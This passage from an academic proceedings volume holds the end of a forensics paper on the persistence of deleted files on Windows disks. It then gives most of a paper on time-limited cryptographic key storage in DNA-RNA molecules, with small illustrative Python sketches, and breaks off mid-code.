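    (9.74, 1, 74.94), (9.72, 13, 75.02), (9.73, 20, 74.77),
    (13.09, 3, 72.89), (13.11, 12, 73.24), (13.12, 21, 73.88),
    (23.78, 3, 72.87), (23.78, 14, 73.85), (23.78, 21, 73.91),
]


def pairwise_gaps(rows):
    """Map each free-space group to its sorted pairwise persistence gaps."""
    groups = {}
    for free_gb, _fragmentation, persistence in rows:
        # Assumption: disks within the same rounded gigabyte form one group.
        groups.setdefault(round(free_gb), []).append(persistence)
    return {
        size: sorted(round(abs(a - b), 2) for a, b in combinations(vals, 2))
        for size, vals in groups.items()
    }


gaps = pairwise_gaps(TABLE_6)
low = gaps[4]  # disks with less than 5 GB free
high = [g for size, gs in gaps.items() if size > 5 for g in gs]

print("below 5 GB:", min(low), "to", max(low))
print("above 5 GB:", min(high), "to", max(high))
```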
Figure 8 is plotted using the data from Table 6. The x-axis represents disk-free bytes in gigabytes, and the y-axis represents the disk fragmentation percentage. Each circle on the graph represents the average persistence of deleted files; the circle sizes are relative to each other. We observed that disk fragmentation significantly impacts deleted files for disks with free space of less than 5 GB. The first three disks, two with 4.28 GB and one with 4.27 GB of free space, were fragmented at 3%, 16%, and 22%, respectively. The average persistence of deleted files is lower for the disk fragmented at 3% than for the disk fragmented at 22%. This indicates that, among disks with less than 5 GB of free space, a more fragmented disk will overwrite less deleted file content than a less fragmented disk.
Fig. 8. Effect of disk fragmentation on deleted files
7 Challenges and Limitations
The differential forensic analysis approach can be used in various use cases, including malware discovery and analysis, insider threat identification, pattern-of-life analysis [19], and other situations that require identifying differences between two or more disk images. In a malware discovery and analysis use case, a malware analyst can infer malware behavior by comparing two disk images, the first taken before the malware was introduced on a system and the second after the malware had infected the system. The differential analysis approach requires at least two disk images: a baseline and a final image. A baseline is the first disk image, taken at a specific time before an incident occurs, and a final image is the last image taken in a use-case scenario. Zero or more intermediary disk images can be taken between the baseline and final images. The approach requires that all intermediary and final images share a common baseline. The limitation of this approach is that a baseline image must be captured before an incident occurs on a system. The approach cannot be used to determine an incident’s before and after effects if a baseline image is not taken prior to the incident.
8 Conclusion
In this paper, we studied several factors that affect deleted file persistence on magnetic disks. The experiments were conducted in a controlled environment. The results indicate that the persistence of a deleted file depends on various factors, including the type of file, the size of new files that an operating system writes to the disk, and the disk condition, which includes the amount of free space and the disk fragmentation percentage at a given point in time. The results also suggest that the persistence of deleted files is affected by the number of new files written on a host system. When a user performs an activity that requires minimal interaction with the system, such as restarting or shutting down the system, 90 to 96% of deleted files remain intact on the system. Writing a small file will possibly overwrite a similar-sized deleted file on the system. Similarly, large-sized files will possibly re-use some of the unallocated sectors previously assigned to large-sized files. Analysis of application and user-generated files indicates that user-generated files persist longer than application-generated files, implying that the type of file impacts the persistence of deleted files. It is also observed that the disk fragmented at the lowest level in a group will overwrite more files than a more fragmented disk. These findings motivate further investigation into the persistence of deleted files in other file systems and devices.
9 Future Work
The persistence of deleted files was studied on a Microsoft Windows 10 operating system. This approach can be further applied to the Linux and Macintosh operating systems to investigate their underlying structure and identify factors that may impact deleted files. This study focused on non-resident and non-fragmented files. Future work may include studying the persistence of resident files, fragmented files, and system files that an operating system creates to track its internal activities.
References
1. Shaaban, A., Sapronov, K.: Filesystem analysis and data recovery. In: Practical Windows Forensics: Leverage the Power of Digital Forensics for Windows Systems, p. 96. Packt Publishing, Birmingham, UK (2016)
2. Zelkowitz, M.V.: Partition organization. In: Advances in Computers: Software Development, p. 7. Academic Press (2011)
3. Vacca, J.R., Rudolph, M.K.: Technical overview: system forensic tools, techniques, and methods. In: System Forensics, Investigation, and Response, p. 86. Jones & Bartlett Learning, Sudbury (2010)
4. Farmer, D., Venema, W.: The persistence of deleted file information. In: Forensic Discovery, pp. 145–148. Addison-Wesley, Upper Saddle River, NJ (2007)
5. Duits, J.: The world’s first data recovery, 08 December 2014. https://www.krollontrack.com/blog/2014/01/09/worlds-first-data-recovery/. Accessed 07 July 2017
6. Carrier, B.: Chapter 1: Digital Investigation Foundations. File System Forensic Analysis, pp. 20–21. Addison-Wesley, Upper Saddle River (2015)
7. Yoo, B., Park, J., Lim, S., Bang, J., Lee, S.: A study on multimedia file carving method. Multimedia Tools Appl. 61(1), 243–261 (2011). https://doi.org/10.1007/s11042-010-0704-y
8. Dewald, A., Seufert, S.: AFEIC: advanced forensic ext4 inode carving. Digit. Investig. 20 (2017). https://doi.org/10.1016/j.diin.2017.01.003
9. Poisel, R., Rybnicek, M., Schildendorfer, B., Tjoa, S.: Classification and recovery of fragmented multimedia files using the file carving approach. Int. J. Mob. Comput. Multimedia Commun. 5(3), 50–67 (2013). https://doi.org/10.4018/jmcmc.2013070104
10. Garfinkel, S.: Carving contiguous and fragmented files with fast object validation. Digit. Investig., 2–12 (2007)
11. Gubanovis, Y., Afonin, O.: Recovering evidence from SSD drives in 2014: understanding TRIM, garbage collection and exclusions. Forensic Focus for Digital Forensics and Ediscovery Professionals (2014). https://articles.forensicfocus.com/2014/09/23/recovering-evidence-from-ssd-drives-in-2014-understanding-trim-garbage-collection-and-exclusions/. Accessed 20 May 2017
12. Russinovich, M.E., Solomon, D.A., Ionescu, A.: Chapter 9: Storage management. In: Windows Internals, Part 2, p. 130. Microsoft Press (2012)
13. Zhang, S.: 8 vital factors affecting hard drive data recovery, 26 May 2017. https://www.datanumen.com/blogs/8-vital-factors-affecting-hard-drive-data-recovery/. Accessed 09 July 2017
14. Lange, M.C., Nimsger, K.M.: Computer forensics. In: Electronic Evidence and Discovery: What Every Lawyer Should Know Now, p. 217. Section of Science & Technology Law, American Bar Association, Chicago, IL (2009)
15. Riden, J.: Persistence of data on storage media, 25 June 2017. https://www.symantec.com/connect/articles/persistence-data-storage-media. Accessed 08 July 2017
16. Reust, J.: Fifth annual DFRWS conference. Digit. Investig. 5, 4 (2005). https://doi.org/10.1016/j.diin.2015.07.001
17. Fairbanks, K., Garfinkel, S.: Column: factors affecting data decay. J. Digit. Forensics Secur. Law 7(2), 7–10 (2012)
18. Jones, J.H., Khan, T.M.: A method and implementation for the empirical study of deleted file persistence in digital devices and media. In: 2017 IEEE 7th Annual Computing and Communication Workshop and Conference (CCWC) (2017)
19. Garfinkel, S., Nelson, A.J., Young, J.: A general strategy for differential forensic analysis. Digit. Investig. 9, S50–S59 (2012)
20. Fairbanks, K.D.: A technique for measuring data persistence using the ext4 file system journal. In: 2015 IEEE 39th Annual Computer Software and Applications Conference (COMPSAC), vol. 3, pp. 18–23. IEEE, July 2015
21. Dittner, R., Majors, K., Seldam, M., Grotenhuis, T., Rule, D., Green, G.: Virtualization with Microsoft Virtual Server 2005, p. 158. Syngress, Rockland, MA (2006)
22. Kumar, K., Stankowic, C., Hedlund, B.: VMware vSphere Essentials: Efficiently Virtualize Your IT Infrastructure with vSphere, p. 126. Packt Publishing, Birmingham (2015)
23. Purcell, D.M., Lang, S.-D.: Forensic artifacts of Microsoft Windows Vista system. In: Yang, C.C., et al. (eds.) ISI 2008. LNCS, vol. 5075, pp. 304–319. Springer, Heidelberg (2008). https://doi.org/10.1007/978-3-540-69304-8_31
24. Chirammal, H.D., Mukhedkar, P., Vettathu, A.: Mastering KVM Virtualization, p. 196. Packt, Birmingham, UK (2016)
25. Shrivastwa, A.: OPENSTACK: Building A Cloud Environment, p. 292. Packt Publishing Limited, Birmingham (2016)
26. Carrier, B.: File System Forensic Analysis, pp. 236–237. Addison-Wesley, Boston (2005)
27. Berman, R.: Chapter 3: How a hard drive works. In: All About Hard Disk Recorders: An Introduction to the Creative World of Digital, Hard Disk Recording, pp. 19–22. Hal Leonard, Milwaukee, WI (2003)
28. Nikkel, B.: Chapter 1: Storage media overview. In: Practical Forensic Imaging: Securing Digital Evidence with Linux Tools, p. 12. No Starch Press, San Francisco (2016)
29. Hailperin, M.: Disk space allocation. In: Operating Systems and Middleware: Supporting Controlled Interaction, p. 284. Thomson, Boston (2007)
30. Jones, J.: Differential analysis as a data science tool for cyber security. In: Sanchez, I.C. (ed.) Proceedings of the Advance and Applications of Data Science and Engineering, pp. 29–32 (2016)
31. Laamanen, M., Nelson, A.: NSRL Next Generation - Diskprinting. Forensics @ NIST, Gaithersburg, MD, 3 December 2014 (2014). http://www.nsrl.nist.gov/Documents/Diskprints.pdf. Accessed 10 Apr 15
32. Jones, J., Khan, T., Laskey, K., Nelson, A., Laamanen, M., White, D.: Inferring previously uninstalled applications from digital traces. In: Proceedings of the Conference on Digital Forensics, Security and Law 2016, pp. 113–130 (2016)
33. Nelson, A.J.: Software signature derivation from sequential digital forensic analysis. Ph.D. dissertation, UC Santa Cruz (2016)
34. Garfinkel, S.L., McCarrin, M.: Hash-based carving: searching media for complete files and file fragments with sector hashing and hashdb. Digit. Investig. 14 (2015). https://doi.org/10.1016/j.diin.2015.05.001
Taphonomical Security: DNA Information with a Foreseeable Lifespan
Fatima-Ezzahra El Orche1,2,3(B), Marcel Hollenstein4, Sarah Houdaigoui1,2, David Naccache1,2, Daria Pchelina1,2, Peter B. Rønne3, Peter Y. A. Ryan3, Julien Weibel1,2, and Robert Weil5
1 ENS, CNRS, PSL Research University, Paris, France {fatima-ezzahra.orche,sarah.houdaigoui,david.naccache,daria.pchelina,julien.weibel}@ens.fr
2 Département d’informatique, École Normale Supérieure Paris, Paris, France
3 SnT, FSTC, University of Luxembourg, Esch-sur-Alzette, Luxembourg {fatima.elorche,peter.roenne,peter.ryan}@uni.lu
4 Institut Pasteur, Paris, France [email protected]
5 Sorbonne University, Inserm, UMR1135, CNRS, ERL8255, CIMI, Paris, France [email protected]
Abstract. This paper introduces the concept of information with a foreseeable lifespan and explains how to achieve this primitive via a new method for encoding and storing information in DNA-RNA sequences. The storage process can be divided into three time-frames. Within the first (life), we can easily read out the stored data with high probability. The second time-frame (agony) is a parameter-dependent state of uncertainty; the data is not easily accessible, but still cannot be guaranteed to be inaccessible. During the third (death), the data can, with high probability, not be recovered without a large computational effort, which can be controlled via a security parameter. The quality of such a system, in terms of a foreseeable lifespan, depends on the brevity of the agony time-frame, and we show how to optimise this. In the present paper, we analyse the use of synthetic DNA and RNA as a storage medium since it is a suitable information carrier and we can manipulate the RNA nucleotide degradation rate to help control the lifespan of the message embedded in the synthesized DNA/RNA molecules. Other media, such as Bisphenol A thermal fax paper or unstable nonvolatile memory technologies, can be used to implement the same principle, but the decay models of each of those phenomena should be re-analysed and the formulae given in this paper adapted correspondingly.
Keywords: Cryptography · Information with foreseeable lifespan · Data storage · Information theory · DNA · RNA
1 Introduction
Over time, the physical media on which we store information degrade. Traditionally, much effort has been put into protecting media against degradation to achieve more robust and durable storage mechanisms.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 674–694, 2023. https://doi.org/10.1007/978-3-031-28073-3_46
In this paper, instead of resisting time’s unavoidable effects, we try to exploit them: rather than allowing information to be destroyed slowly and progressively, we aim at a swift and complete erasure. Just as thermal fax paper fades with time, we propose to synthesize DNA and RNA molecules whose lifetime can be approximately tuned. Such a “time fuse” can guarantee, for instance, that a cryptographic secret (typically a plaintext encrypted under a hash of the DNA information) cannot be used or recovered beyond some expiry date. Since DNA is a reasonably stable molecule, we assume in this paper that DNA does not degrade at all. By contrast, RNA nucleotides quickly decay over time. We hence propose to synthetically incorporate RNA nucleotides in DNA molecules. The DNA nucleotides will store the cryptographic secret whereas RNA will serve as a natural countdown mechanism. This technique guarantees that, with high probability, the whole secret will be recoverable before some target time $t_{\mathrm{target}_1}$, but will not be reconstructible after $t_{\mathrm{target}_2}$. A mathematical analysis allows tuning the $t_{\mathrm{target}_i}$ as a function of the molecules’ decay probability distribution and the storage environment parameters such as temperature and exposure to radiation.
Structure of the Paper. We start (Sect. 2) with a general overview of the biochemical notions necessary to understand the concept. The method itself is presented in Sect. 3. In Sect. 4, we introduce a probabilistic model and mathematically determine bounds on the $t_{\mathrm{target}_i}$. We analyse our method’s efficiency and explain how to tune the $t_{\mathrm{target}_i}$ in Sect. 5. Appendix A provides proofs and Appendix B lists numerical values.
2 Biochemical Preliminaries
For the article to be understandable, it is necessary to present a few biochemical notions about DNA and RNA [16]. The following sections deal with DNA and RNA composition and degradation. The acronym “NA” (Nucleic Acid) will denote DNA and/or RNA.
2.1 NA Composition
DNA and RNA belong to the category of NAs, which are bio-macro-molecules; both are chains of nucleotides. A nucleotide is composed of a nucleobase, a pentose sugar and one phosphate group. In nature, there exist five different nucleobases: adenine (A), thymine (T), uracil (U), cytosine (C) and guanine (G). DNA contains A, T, C, G, whereas RNA contains A, U, C, G. Figure 1 shows the structures of NAs, while Fig. 2 details the four DNA nucleotides. A fundamental difference between DNA and RNA is their pentose composition. The DNA pentose is a deoxyribose sugar, which has no hydroxyl substituent at position C2’, whereas the RNA sugar is a ribose, which contains a 2’-hydroxyl (OH) moiety, as shown in Fig. 3.
Fig. 1. RNA and DNA structures
Fig. 2. Closeup structure of DNA with the four nucleotides represented: Adenine, Thymine, Cytosine, and Guanine
Another chemical difference between DNA and RNA appears when considering hydrolysis in buffer: cleavage can occur by an intramolecular attack of the 2’-OH unit of the sugar moiety on the phosphorus center of the phosphodiester unit. Since RNA has a 2’-OH and DNA lacks one, this reaction is favored in RNA, as shown by the difference in the rates of uncatalyzed hydrolysis [15] (see Sect. 2.2).
2.2 NA Bonds Degradation Over Time
NAs degrade over time. The main degradation reaction of RNA nucleotides is called transesterification, while the main degradation phenomena for DNA are phosphodiester hydrolysis, oxidative cleavage, and cleavage as a result of depurination. Whilst we will not dive deeper into the particularities of those biochemical processes, the reader may wonder why the same degradation reactions do not apply to both DNA and RNA. This results from the fact that the difference in the pentose has a considerable influence on the reactions leading to degradation. Briefly, in DNA a hydroxide ion (OH-) will attack the phosphorus center, which eventually leads to hydrolysis of the phosphodiester bond. Such a mechanism can also occur in RNA, but since RNA displays a 2’-OH moiety, this hydroxyl group can be activated (by deprotonation under basic conditions or by metal coordination) and attack the phosphorus center in an intramolecular rather than in an intermolecular manner [12,18]. In particular, there is a big difference between the two degradation speeds: under representative physiological conditions, RNA hydrolysis is $10^5$ times faster than DNA hydrolysis. The DNA degradation speed is hence almost negligible compared to the RNA degradation speed. In what follows, our mathematical analysis therefore considers chiefly RNA degradation. Figure 4 illustrates the way in which RNA degrades.
Fig. 3. RNA and DNA Pentose
Fig. 4. RNA degradation through transesterification
2.3 On the Synthesis of RNA-DNA Chimeric Oligonucleotides
Oligonucleotides in general can be synthesized by two main approaches: chemical synthesis based on solid-phase methods and enzymatic synthesis. In this section, we briefly describe both methods and then highlight how the DNA-RNA chimeric oligonucleotides required for our purposes could be made.
Chemical Synthesis. The main synthetic access to RNA and DNA oligonucleotides is granted by automated DNA and RNA solid-phase synthesis. In this approach, activated nucleoside units called phosphoramidites are sequentially added on a first nucleoside bound to a solid support. Each cycle encompasses a coupling step (where the incoming phosphoramidite is reacted with a free 5’-OH unit of a solid-support-bound nucleoside) followed by a capping step (to avoid reaction of unreacted hydroxyl moieties in subsequent steps). The coupling and capping steps are followed by oxidation of the newly created linkages (P(III) to P(V)) and removal of the next protecting group to enable continuation of the synthesis (the interested reader is directed to more comprehensive review articles dedicated to this topic [8,11]). Such syntheses are usually carried out on synthesizers (Fig. 5) on scales ranging from μmoles to moles. This method is routinely used to synthesize DNA and RNA oligonucleotides either based on standard chemistry or encompassing chemical modifications required for in vivo applications. However, this method is restricted to rather short oligonucleotides (i.e. around 100–150 nucleotides for DNA and around 100 nucleotides for RNA [2,8,11]) due to low yields for fragments exceeding 100 nucleotides, caused by folding on the solid support during synthesis and by the inherent nature of the coupling yields (even with a 99% coupling efficiency, the maximum theoretical yield that can be obtained for a 100-nucleotide-long sequence would be $0.99^{100} \approx 37\%$). Hence, this approach is ideal for synthesizing short DNA-RNA chimeric oligonucleotides but is unlikely to be applicable to longer sequences.
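The yield argument above is a plain power law, and a short sketch makes the length limit visible. Following the text, the per-step efficiency is raised to the sequence length; the function name and the set of example lengths are illustrative choices, not values from the paper.

```python
def max_full_length_yield(coupling_efficiency, length):
    """Upper bound on the fraction of full-length product.

    As in the text, every position is assumed to need one successful
    coupling step, so the efficiency is raised to the sequence length.
    """
    return coupling_efficiency ** length


# Example lengths chosen for illustration only.
for n in (20, 50, 100, 150, 200):
    pct = 100 * max_full_length_yield(0.99, n)
    print(f"{n:>3} nucleotides: at most {pct:.1f}% full-length product")
```

Because the bound decays geometrically, doubling the length squares the yield fraction, which is why longer constructs are better assembled from short fragments than synthesized in one run.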
Fig. 5. DNA synthesizer used for solid-phase synthesis of DNA and RNA oligonucleotides
Enzymatic Methods. The most popular enzymatic methods for the synthesis of oligonucleotides include polymerase-assisted synthesis using nucleoside triphosphates and ligation of shorter fragments into long oligonucleotides. In the first strategy, nucleoside triphosphates are recognized by enzymes called polymerases, which add these nucleotides onto a growing chain of DNA or RNA. For DNA synthesis, the presence of a primer and a template is strictly required, since the polymerase adds nucleotides at the 3’-end of the primer while the sequence composition of the template dictates to the polymerase which nucleotide needs to be incorporated. On the other hand, RNA polymerases are primer independent and only require the presence of a DNA template to mediate transcription of DNA into RNA. Such a method can be coupled with chemical modifications to generate mRNA vaccines [4,13] and other functional nucleic acids [1,7]. This method is not restricted by any size limitation and is compatible with numerous chemical modifications. However, the sequence-specific incorporation of distinct RNA nucleotides in long DNA oligonucleotides will be difficult to achieve by this method. In the second method, DNA or RNA ligases mediate the formation of phosphodiester linkages between the terminal 3’-OH residue of one oligonucleotide and the 5’-end (usually phosphorylated) of a second oligonucleotide [17]. Often a “splint” oligonucleotide is required as a template, since this guide oligonucleotide is partially complementary to the termini of both oligonucleotides that need to be ligated together. This method is compatible with the synthesis of longer oligonucleotides [14] as well as with different chemistries in oligonucleotides [5,10], and hence is deemed the method of choice for this project.
Synthesis of RNA-DNA Chimeric Oligonucleotides. To synthesize long DNA oligonucleotides containing RNA nucleotides at distinct and specific positions, we propose to synthesize short DNA-RNA sequences using solid-phase synthesis and to combine these fragments by (repeated) ligation reactions, as highlighted in Fig. 6. This protocol will circumvent the drawbacks associated with the individual methods and should yield the desired oligonucleotides.
Fig. 6. Schematic representation of the synthesis of long DNA oligonucleotides containing RNA nucleotides (star symbols) using a combination of solid-phase synthesis (short blue fragments) and DNA ligation reactions
2.4 RNA Degradation in Further Detail
The time until an RNA nucleotide degrades follows an exponential distribution with parameter λ. λ depends on numerous factors such as temperature, pH and the concentration of some ions¹. Degradation also depends on the sequence context and the 3D structure of the RNA oligonucleotide. We will use Eq. (1) of [9] to model λ:
$$\lambda = \lambda_0 \cdot 10^{e} \cdot c_K \cdot [K^+]^{d_K} \cdot c_{Mg} \cdot [Mg^{2+}]^{d_{Mg}} \qquad (1)$$
where $e = a_{pH}(pH - b_{pH}) + a_K([K^+] - b_K) + a_T(T - b_T)$, $\lambda_0 = 1.3 \cdot 10^{-9}\ \mathrm{min}^{-1}$, and the constants are indicated in Table 4 in Appendix B with their corresponding units. Note that Eq. (1) is an approximation and $\lambda_0$ needs to be updated depending on the considered range of physical parameters. See [9] for more details. We give in Table 7 in Appendix B several λ values under different conditions and the corresponding $\lambda_0$ values. The expected time for one RNA nucleotide to degrade (which is 1/λ) is given in the table to give an idea of the order of magnitude of time. This will prove helpful in the rest of the paper for determining which λ to work with when tuning the information’s lifetime. The chemical parameters mentioned in this table are taken from Table 1 and using Equation (e) from [9].
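To make the exponential model concrete, the following sketch evaluates Eq. (1) as a function of its inputs and derives the survival probability, the expected lifetime 1/λ and the half-life of a single RNA nucleotide. The numeric rate used in the example is a placeholder, not a value from the paper or from [9]; the constants of Table 4 in Appendix B would have to be supplied by the reader.

```python
import math


def rate_eq1(lam0, e, c_K, conc_K, d_K, c_Mg, conc_Mg, d_Mg):
    """Evaluate Eq. (1): lam0 * 10^e * c_K * [K+]^d_K * c_Mg * [Mg2+]^d_Mg.

    All constants are passed in by the caller; none are hard-coded here.
    """
    return lam0 * 10 ** e * c_K * conc_K ** d_K * c_Mg * conc_Mg ** d_Mg


def survival_probability(lam, t):
    """P(a single RNA nucleotide is still intact at time t) = exp(-lam * t)."""
    return math.exp(-lam * t)


def expected_lifetime(lam):
    """Mean of the exponential distribution, 1 / lam."""
    return 1.0 / lam


def half_life(lam):
    """Time at which the survival probability reaches 1/2."""
    return math.log(2) / lam


lam = 1.0e-4  # per minute; placeholder value, NOT taken from the paper
print(expected_lifetime(lam))                    # mean lifetime in minutes
print(half_life(lam))                            # half-life in minutes
print(survival_probability(lam, 60 * 24))        # intact after one day
```

Note that the half-life is shorter than the mean lifetime by a factor of ln 2, so quoting 1/λ alone overstates how long a typical nucleotide stays intact.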
3 The Proposed Method
This section presents our new method for encoding and storing information using DNA and RNA nucleotides. We propose a way to synthesize a new DNA/RNA molecule, and we show that our method can reach a good security level.

3.1 Description of the Method
The idea is to incorporate RNA fragments into DNA oligonucleotides using standard solid-phase synthesis, producing DNA-RNA chimeric sequences that form a new DNA/RNA chimeric oligonucleotide. A DNA fragment can be composed of one nucleotide base (A, C, T, G) or of a juxtaposition of several nucleotide bases linked to each other (AA, CC, TT, GG, AC, AT, GT, ACT, etc.). The chain’s length depends on the size of the key that we want to encode and store. This DNA/RNA chimeric oligonucleotide will contain k RNA nucleotides and k + 1 DNA fragments. We synthesize n copies of this molecule and keep them in a fluid. To understand the insertion/encoding mechanism, we refer the reader to Fig. 7, which illustrates the insertion of the key SECRET. In this example, we have 5 RNA nucleotides and 6 DNA fragments and an alphabetic substitution for each

1 [K+], [Mg2+].
Taphonomical Security
681
letter in which we arbitrarily assigned different fragments to different letters of the English alphabet. Note that below we will actually use distinct DNA molecule fragments and encode the stored information into the permutation of these.
Fig. 7. An explanatory illustration of one copy of the DNA/RNA oligonucleotide encoding the key SECRET. Beads represent DNA fragments and inter-bead links are RNA nucleotides
3.2 Encrypting Information

Encrypt the information to be time-protected using some symmetric cipher (e.g. AES [3]) and encode the key as a DNA/RNA oligonucleotide using a permutation of pairwise distinct DNA fragments. Erase the plaintext and the electronic version of the key, and assume that the ciphertext is accessible to the opponent. Hence, as long as we can reconstruct the key from the DNA/RNA oligonucleotide, the plaintext is recoverable. We will now focus our attention on the recovery of the key from the DNA/RNA oligonucleotide, as long as this molecule is physically reconstructible.

3.3 Key Reconstruction
We assume that the DNA fragments are pairwise distinct by construction. Call the DNA/RNA oligonucleotide w and remember that it contains k RNA nucleotides. Remember as well that there are n copies of w floating in a liquid. Suppose that all the copies of w were cut randomly in pieces. We are given the set of these pieces, and we seek to restore the initial oligonucleotide w if such a reconstruction is still possible. Figure 8 represents the evolution of 3 copies of a key made of 9 DNA fragments.
Fig. 8. An evolution of a secret with 3 copies and 9 fragments in each copy
The following algorithm outlines how we can recover the information after it has begun degrading, if such a reconstruction is possible at all.

– 1 First, we obtain all fragments of w by analysing the pieces we are given. For each fragment x, we try to find the “next” fragment next[x] (the one which follows x in the molecule w). If the next fragment is found for all fragments except one (which is w’s last fragment), we can restore w.
– 2 For any two fragments x and y, if there exists a piece in which y follows x, then y also follows x in the initial molecule w, and thus next[x] = y. Therefore, we just have to treat each piece as follows: for every fragment x of the piece except the last, define next[x] as the fragment following x inside that piece. Since all fragments of w are distinct, there is at most one possible value of next[x] for each fragment x. Figure 9 represents this relation in a graph.
– 3 After this procedure, we look for a fragment which follows nothing. If it is unique, we set it as the first fragment and then add next fragments one by one until there is nothing to add. This allows us to reconstruct w. If there are several such fragments, w cannot be recovered without brute-force guessing.
Fig. 9. The graph representing the next[x] relation in the algorithm
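The three steps of the reconstruction algorithm can be sketched in Python as follows. This is a minimal illustration, not the authors' implementation: pieces are modelled as lists of fragment labels, and the function name `reconstruct` and the labels `f1` to `f6` are hypothetical. As in the text, the sketch assumes that all DNA fragments of w are pairwise distinct.

```python
def reconstruct(pieces):
    """Rebuild the fragment order of w from degraded pieces, or return None.

    pieces: iterable of lists of fragment labels, each list giving the
    fragments of one piece in order.
    """
    nxt = {}                 # the next[x] relation of step 2
    fragments = set()
    has_predecessor = set()
    for piece in pieces:
        fragments.update(piece)
        for x, y in zip(piece, piece[1:]):
            nxt[x] = y       # y follows x in some piece, hence in w
            has_predecessor.add(y)

    # Step 3: a unique fragment following nothing must be the first one.
    starts = [f for f in fragments if f not in has_predecessor]
    if len(starts) != 1:
        return None          # at least one cut: brute-force guessing needed

    w = [starts[0]]
    while w[-1] in nxt:
        w.append(nxt[w[-1]])
    return w


# Two copies of a 6-fragment molecule, each broken at a different bond.
pieces = [["f1", "f2"], ["f3", "f4", "f5", "f6"],
          ["f1", "f2", "f3"], ["f4", "f5", "f6"]]
print(reconstruct(pieces))

# Both copies broken at the same bond (a cut): reconstruction fails.
print(reconstruct([["f1", "f2"], ["f3"], ["f1", "f2"], ["f3"]]))
```

In the first call every bond survives in at least one copy, so the chain is recovered; in the second call the bond between `f2` and `f3` is broken in all copies and the function reports failure.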
If several fragments follow nothing at the end of the algorithm, it is impossible to recover the initial molecule from the input alone. We can only obtain separate pieces of w by applying the last step of the algorithm to each of the “first” fragments. This situation happens if and only if at least one cut occurred during degradation, i.e. the RNA nucleotide at one specific location broke in all copies of the molecule. The probability of this happening will be investigated in the next section.

3.4 Security
We now turn to measure our method’s security, but before doing so, let us define what the term cut means.
Definition 1. For 1 ≤ i ≤ k, a cut happens at the i-th position if the i-th bond of each of the n copies is broken.

Assume that the secret contains cuts. For each cut, the fragment right after this cut follows nothing according to the reconstruction algorithm. At the same time, for every other fragment except the first one of the initial molecule, there is at least one piece where this fragment follows another one. This means that the only pieces which can be recovered are those delimited by two cuts, or by one cut and an endpoint of the initial molecule. Since no link can be guessed between two such pieces, the only strategy to recover the whole initial molecule is to test all permutations of the reconstructed pieces. If there are k cuts, then (k + 1)! possibilities need to be browsed. This fact defines security: a given number of cuts guarantees a security of ≈ 80, 100, 128 or 256 bits. Table 3 (a trivial log2 (k + 1)! lookup table given in Appendix B for ease of reference) gives the correspondence between the number of security bits and the number of cuts and DNA fragments. The number of security bits, which is called the security parameter and which we denote a, is simply a = log2 (nD!), where nD is the number of DNA fragments.

Current Biological Limitations. It is currently technically feasible to have an NA chain of about 100 nucleobase pairs [2,8,11]. Each DNA chunk is linked by an RNA pair. In the security analysis in this paper we assume that each DNA chunk is unique, since copies reduce the security (and would make the following analysis harder). Since the security stems directly from the number of RNA fragments, we should construct chains containing the maximal number of RNA bonds while observing distinctness of the DNA fragments.
Hence, we start by generating all 1-digit integers in base 4 (there are u1 = 4 of them), then all 2-digit integers in base 4 (there are u2 = 4^2 = 16 of them), and finally we fill in with 3-digit integers in base 4. Linking the u1 + u2 = 20 1- and 2-digit fragments requires u1 + u2 − 1 = 19 RNA nucleobase pairs. Hence, all in all we are already at a molecule comprising:

u1 + 2u2 + u1 + u2 − 1 = 4 + 2 × 16 + 4 + 16 − 1 = 55 pairs

To proceed, the 45 remaining pairs, permitted by the current technological synthesis capacity, must be constructed using 3-digit integers linked with 1 RNA bond. We can hence solve 45 ≥ 3u3 + u3 to get u3 = 11 (we need one RNA bond for each 3-digit fragment and one RNA to bind to the rest of the string). The security level of the resulting scheme is log2 ((u1 + u2 + u3)!) = log2 31! ≈ 113 bits.

Note that it is possible to artificially construct new types of DNA molecules, see [6] where two new types have been constructed. Assuming that we have 6 different types of DNA molecules at hand, the analysis above can be repeated. We now have 6 1-digit integers in base 6 and 36 2-digit integers in base 6. We first choose u1 = 6, which leaves 100 − (u1 + u1 − 1) = 89 molecules. We then solve 89 ≥ 2u2 + u2 to get u2 = 29. In this case we do not need 3-digit integers. In total we now have 34 RNA bonds and a security level of log2 ((u1 + u2)!) = log2 35! ≈ 133 bits.
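The counting argument above is easy to re-check numerically. The following Python sketch recomputes the number of fragments that fit into a 100-nucleotide chain and the resulting security parameter a = log2(nD!); the helper name `security_bits` and the variable names are ours.

```python
import math


def security_bits(num_fragments):
    """Security parameter a = log2(nD!) for nD pairwise distinct DNA fragments."""
    return math.log2(math.factorial(num_fragments))


# Base-4 alphabet: all 1-digit and 2-digit fragments, then 3-digit fragments.
u1, u2 = 4, 16
used = u1 + 2 * u2 + (u1 + u2 - 1)   # nucleotides used so far
u3 = (100 - used) // 4               # each 3-digit fragment costs 3 + 1 RNA bond
print(used, u3, round(security_bits(u1 + u2 + u3)))

# Base-6 alphabet: all 1-digit fragments, then 2-digit fragments.
v1 = 6
left = 100 - (v1 + v1 - 1)
v2 = left // 3                       # each 2-digit fragment costs 2 + 1 RNA bond
print(left, v2, round(security_bits(v1 + v2)))
```

The same helper also reproduces the entries of Table 3 when called with the number of cuts plus one.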
4 Controlling the Information Lifetime

In order to understand and control the lifetime of the information embedded in the DNA/RNA molecules, we introduce a probabilistic model and mathematically determine the bounds on the information lifetime.

4.1 Probabilistic Model
Recall that k denotes the number of RNA nucleotides in each of the n identical copies of the initial molecule w. Denote by $L_{i,j}$ the random variable giving the degradation time of the $j$-th RNA nucleotide of the $i$-th copy. Our main assumption is that the $L_{i,j}$, for all $i, j$, are independent and identically distributed random variables following the exponential distribution of parameter $\lambda$. Denote by $T_j$ the random variable representing the time for the cut at the $j$-th position to appear and by $t_x$ the random variable giving the time at which the $x$-th cut appears. $t_x$ is the $x$-th order statistic of $(T_j)_{1 \le j \le k}$, i.e. the $x$-th smallest element of $\{T_1, \dots, T_k\}$. By definition, $T_j = \max_{1 \le i \le n} L_{i,j}$ and, in compact notation, $t_x = T_{(x)}$.
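To make the model concrete, the following Python sketch draws one realisation of the cut times directly from the definitions above. It is only an illustration under the stated i.i.d. exponential assumption; the function name `simulate_cut_times` and the fixed seed are our own choices.

```python
import random


def simulate_cut_times(n, k, lam, rng):
    """Draw one realisation of the sorted cut times t_1 <= ... <= t_k.

    The bond at position j of copy i breaks after an Exp(lam) time L_ij.
    The cut at position j appears at T_j = max over the n copies of L_ij,
    and t_x is the x-th smallest of the T_j.
    """
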